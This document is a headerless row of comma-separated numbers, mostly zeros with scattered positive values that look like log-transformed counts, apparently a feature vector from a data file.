0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 3.5263605246161616, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 3.6888794541139363, 1.9459101490553132, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 2.1972245773362196, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 5.342334251964811, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 3.649511027115099, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.713572066704308, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.49053690687189, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 3.649511027115099, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.828641396489095, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8918202981106265, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.23410650459726, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.825453896395788, 0.0, 0, 0, 0.0, 0.0, 0, 0, 5.101797476893978, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.2237778411112, 0, 0.0, 0.0, 0, 0.0, 0, 10.849972553336867, 0, 0.0, 0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 2.8903717578961645, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.520577332514767, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 3.6109179126442243, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.258096538021482, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.5649493574615367, 5.723585101952381, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 5.7430031878094825, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 4.605170185988092, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.550898738446989, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 4.276666119016055, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.280392111322715, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.2188758248682006, 0, 0.0, 6.9558749307258045, 0, 0.0, 0.0, 0.0, 8.791967689147654, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8501476017100584, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.367295829986474, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8066624897703196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.115509720156162, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.931825632724326, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.367295829986474, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 